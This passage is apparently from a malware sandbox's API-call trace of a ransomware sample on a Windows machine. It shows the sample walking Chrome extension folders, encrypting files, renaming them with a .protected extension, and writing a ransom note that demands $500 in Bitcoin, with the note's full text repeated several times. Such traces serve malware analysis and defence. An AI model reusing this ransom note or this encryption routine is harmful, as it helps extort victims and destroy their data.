data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0079.209] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.209] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 160 [0079.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.209] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.209] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.210] lstrlenA (lpString="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") returned 684 [0079.210] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.210] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.210] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.211] CloseHandle (hObject=0x164) returned 1 [0079.211] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0079.211] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg") returned 142 [0079.211] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0079.211] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0079.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*") returned 144 [0079.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.211] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.211] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\.") returned 144 [0079.211] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.211] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.212] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.212] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.212] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.212] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\..") returned 145 [0079.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.212] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.212] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.212] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.212] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x13f, lpOverlapped=0x0) returned 1 [0079.213] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.213] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x13f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x13f, lpOverlapped=0x0) returned 1 [0079.214] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.214] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.214] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.214] CloseHandle (hObject=0x168) returned 1 [0079.214] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected") returned 166 [0079.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0079.215] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.215] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.215] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 160 [0079.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.215] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.215] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.216] lstrlenA (lpString="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") returned 684 [0079.216] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.216] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.216] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.216] CloseHandle (hObject=0x164) returned 1 [0079.216] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0079.216] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca") returned 142 [0079.216] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0079.216] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*") returned 144 [0079.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.217] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\.") returned 144 [0079.217] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.217] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\..") returned 145 [0079.217] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.217] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.217] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.217] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.217] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.218] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.218] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.218] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.219] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0079.220] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0079.220] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.220] CloseHandle (hObject=0x168) returned 1 [0079.220] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected") returned 166 [0079.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0079.221] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.221] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.221] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 160 [0079.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.221] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.221] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.224] lstrlenA (lpString="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") returned 684 [0079.224] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
